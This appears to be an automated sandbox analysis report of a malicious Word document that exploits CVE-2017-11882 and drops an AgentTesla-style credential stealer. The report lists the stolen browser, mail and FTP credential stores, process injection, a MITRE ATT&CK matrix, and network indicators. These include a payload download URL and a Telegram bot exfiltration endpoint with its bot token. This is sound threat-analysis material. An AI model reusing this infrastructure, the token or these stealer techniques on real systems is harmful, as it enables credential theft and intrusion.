                  Source: C:\Users\user\AppData\Local\Temp\Client.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 9.2.Client.exe.3169510.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Client.exe.3169510.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.932287438.0000000003109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.932391087.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000000.926194509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1003248820.00000000020EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.986609163.0000000002390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.986080759.0000000002309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.1193449278.00000000022DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 2348, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2656, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1152, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2176, type: MEMORYSTR
                  Source: Yara matchFile source: 0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.986080759.0000000002309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2656, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1152, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2176, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: Yara matchFile source: 0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.986080759.0000000002309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2656, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1152, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2176, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 9.2.Client.exe.3169510.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Client.exe.3169510.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.932287438.0000000003109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.932391087.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000000.926194509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1003248820.00000000020EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.986609163.0000000002390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.986080759.0000000002309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.1193449278.00000000022DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 2348, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2656, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1152, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2176, type: MEMORYSTR
                  Source: Yara matchFile source: 0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.986080759.0000000002309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2656, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1152, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2176, type: MEMORYSTR
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts211
                  Windows Management Instrumentation
                  Path Interception311
                  Process Injection
                  1
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services1
                  Archive Collected Data
                  Exfiltration Over Other Network Medium1
                  Web Service
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts53
                  Exploitation for Client Execution
                  Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                  Obfuscated Files or Information
                  11
                  Input Capture
                  114
                  System Information Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  Exfiltration Over Bluetooth12
                  Ingress Tool Transfer
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
                  Software Packing
                  1
                  Credentials in Registry
                  1
                  Query Registry
                  SMB/Windows Admin Shares1
                  Email Collection
                  Automated Exfiltration11
                  Encrypted Channel
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Masquerading
                  NTDS221
                  Security Software Discovery
                  Distributed Component Object Model11
                  Input Capture
                  Scheduled Transfer3
                  Non-Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Modify Registry
                  LSA Secrets141
                  Virtualization/Sandbox Evasion
                  SSH1
                  Clipboard Data
                  Data Transfer Size Limits14
                  Application Layer Protocol
                  Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common141
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items311
                  Process Injection
                  DCSync1
                  Remote System Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 680478 Sample: ICPO07082299976.doc Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 60 Snort IDS alert for network traffic 2->60 62 Multi AV Scanner detection for domain / URL 2->62 64 Document contains OLE streams which likely are hidden ActiveX objects 2->64 66 18 other signatures 2->66 8 EQNEDT32.EXE 47 2->8         started        11 EQNEDT32.EXE 2->11         started        13 WINWORD.EXE 304 31 2->13         started        16 2 other processes 2->16 process3 file4 88 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->88 18 cmd.exe 8->18         started        20 cmd.exe 11->20         started        40 C:\Users\user\AppData\Local\Temp\Client.exe, PE32 13->40 dropped 42 C:\Users\user\...\Client.exe:Zone.Identifier, ASCII 13->42 dropped 44 ~WRF{B571C632-7DEC...C-1CEF56BCD21F}.tmp, Composite 13->44 dropped 90 Document exploit detected (creates forbidden files) 13->90 22 Client.exe 13->22         started        signatures5 process6 dnsIp7 26 Client.exe 12 18->26         started        30 Client.exe 20->30         started        48 162.159.133.233, 443, 49177 CLOUDFLARENETUS United States 22->48 50 cdn.discordapp.com 22->50 82 Writes to foreign memory regions 22->82 84 Allocates memory in foreign processes 22->84 86 Injects a PE file into a foreign processes 22->86 32 RegSvcs.exe 2 22->32         started        signatures8 process9 dnsIp10 52 cdn.discordapp.com 162.159.134.233, 443, 49173 CLOUDFLARENETUS United States 26->52 54 109.206.241.81, 49174, 49178, 49180 AWMLTNL Germany 26->54 92 Antivirus detection for dropped file 26->92 94 Multi AV Scanner detection for dropped file 26->94 96 Machine Learning detection for dropped file 26->96 34 RegSvcs.exe 12 10 26->34         started        56 162.159.135.233, 443, 49179 CLOUDFLARENETUS United States 30->56 98 Writes to foreign memory regions 30->98 100 Allocates memory in foreign processes 30->100 102 Injects a PE file into a foreign processes 30->102 38 RegSvcs.exe 30->38         started        58 api.telegram.org 32->58 104 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 32->104 106 Tries to steal Mail credentials (via file / registry access) 32->106 signatures11 process12 dnsIp13 46 api.telegram.org 149.154.167.220, 443, 49175, 49176 TELEGRAMRU United Kingdom 34->46 68 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 34->68 70 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 34->70 72 Tries to steal Mail credentials (via file / registry access) 34->72 74 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 34->74 76 Tries to harvest and steal ftp login credentials 38->76 78 Tries to harvest and steal browser information (history, passwords, etc) 38->78 80 Installs a global keyboard hook 38->80 signatures14

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  ICPO07082299976.doc73%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                  ICPO07082299976.doc100%AviraEXP/CVE-2017-11882.Gen
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B571C632-7DEC-4279-BDFC-1CEF56BCD21F}.tmp100%AviraEXP/CVE-2017-11882.Gen
                  C:\Users\user\AppData\Local\Temp\Client.exe100%AviraHEUR/AGEN.1251478
                  C:\Users\user\AppData\Local\Temp\Client.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Client.exe20%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                  SourceDetectionScannerLabelLinkDownload
                  10.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                  9.0.Client.exe.ac0000.0.unpack100%AviraHEUR/AGEN.1251478Download File
                  9.2.Client.exe.ac0000.1.unpack100%AviraHEUR/AGEN.1202427Download File
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                  https://api.telegram.orgP0%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://fWvVfB.com0%Avira URL Cloudsafe
                  https://api.ipify.org%%startupfolder%0%URL Reputationsafe
                  http://109.206.241.81/htdocs/eZYWw.exe16%VirustotalBrowse
                  http://109.206.241.81/htdocs/eZYWw.exe100%Avira URL Cloudmalware
                  http://ypWPmbJ0rAhp55WcExAk.org0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                  http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://109.206.241.81P0%Avira URL Cloudsafe
                  https://api.ipify.org%0%URL Reputationsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  cdn.discordapp.com
                  162.159.134.233
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://cdn.discordapp.com/attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignature.dllfalse
                        high
                        http://109.206.241.81/htdocs/eZYWw.exetrue
                        • 16%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocumentfalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1RegSvcs.exe, 0000000A.00000002.986080759.0000000002309000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          https://cdn.discordapp.com/attachments/1005703293437235255/1005705055426588785/RealProxyFlagsBadSignClient.exe, 00000009.00000002.928299566.0000000002101000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000009.00000002.928058615.00000000003AF000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984634446.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001971815.000000000264B000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://api.telegram.orgRegSvcs.exe, 0000000A.00000002.987311161.0000000002420000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.987738034.0000000002481000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1004034491.0000000002182000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194992268.00000000023F5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194461229.0000000002392000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.entrust.net/server1.crl0Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://ocsp.entrust.net03Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwRegSvcs.exe, 0000000A.00000002.986080759.0000000002309000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1002709829.0000000002069000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.telegram.orgPRegSvcs.exe, 0000000A.00000002.987311161.0000000002420000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1004034491.0000000002182000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194461229.0000000002392000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.diginotar.nl/cps/pkioverheid0Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/Client.exe, 00000009.00000002.932287438.0000000003109000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000009.00000002.932391087.0000000003169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.926194509.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                  high
                                  http://fWvVfB.comRegSvcs.exe, 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.ipify.org%%startupfolder%RegSvcs.exe, 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  low
                                  https://cdn.discordapp.comClient.exe, 00000009.00000002.928299566.0000000002101000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984634446.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001971815.000000000264B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://ypWPmbJ0rAhp55WcExAk.orgRegSvcs.exe, 00000015.00000002.1193947075.0000000002320000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194571279.00000000023A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://crl.entrust.net/serverRegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/sendDocumentdocument-----RegSvcs.exe, 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://DynDns.comDynDNSnamejidpasswordPsi/PsiRegSvcs.exe, 00000015.00000002.1192835288.0000000002279000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://api.telegram.orgRegSvcs.exe, 0000000A.00000002.987370165.0000000002433000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.987738034.0000000002481000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1004119110.0000000002196000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194992268.00000000023F5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194571279.00000000023A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://ocsp.entrust.net0DClient.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameClient.exe, 00000009.00000002.928299566.0000000002101000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.987311161.0000000002420000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984634446.0000000002641000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1004034491.0000000002182000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001971815.000000000264B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1194461229.0000000002392000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://secure.comodo.com/CPS0Client.exe, 00000009.00000002.928094974.00000000003DD000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.989116143.0000000005870000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000C.00000002.984052209.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.1005830692.0000000006057000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000014.00000002.1001151669.000000000054D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.1196914685.0000000005EBE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
